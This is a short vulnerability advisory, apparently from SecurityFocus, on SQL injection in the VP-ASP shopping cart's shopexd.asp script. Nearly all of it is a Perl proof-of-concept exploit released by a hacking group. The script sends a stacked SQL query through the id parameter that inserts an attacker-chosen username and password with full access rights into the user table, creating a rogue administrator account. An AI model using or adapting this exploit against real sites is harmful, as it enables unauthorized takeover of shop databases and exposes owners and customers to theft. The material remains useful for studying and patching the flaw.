source: https://www.securityfocus.com/bid/8159/info It has been reported that VP-ASP does not sufficiently sanitize user input passed to the shopexd.asp script contained in the software. As a result, it may be possible for remote attackers to embed SQL commands which are to be passed to the underlying database engine. #!/usr/bin/perl -w $pamer = " 1ndonesian Security Team (1st) ============================== tio-fux.pl, vpasp SQL Injection Proof of Concept Exploit by : Bosen & TioEuy Discover by : TioEuy, AresU Greetz to : AresU, syzwz (ta for da ipod), TioEuy, sakitjiwa, muthafuka all #hackers\@centrin.net.id/austnet.org http://bosen.net/releases/ "; # shut up ! we're the best in our country :) use LWP::UserAgent; # LWP Mode sorry im lazy :) use HTTP::Request; use HTTP::Response; $| = 1; print $pamer; if ($#ARGV<3){ print "\n Usage: perl tio-fux.pl \n\n"; exit; } my $biji = "1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29"; $tio = "$ARGV[0]/shopexd.asp?id=$ARGV[1]"; $tio .= ";insert into tbluser (\"fldusername\",\"fldpassword\",\"fldaccess\") "; $tio .= "values ('$ARGV[2]','$ARGV[3]','$biji')--"; my $bosen = LWP::UserAgent->new(); my $gembel = HTTP::Request->new(GET => $tio); my $dodol = $bosen->request($gembel); if ($dodol->is_error()) { printf " %s\n", $dodol->status_line; } else { print "Tuing !\n"; } print "\n680165\n";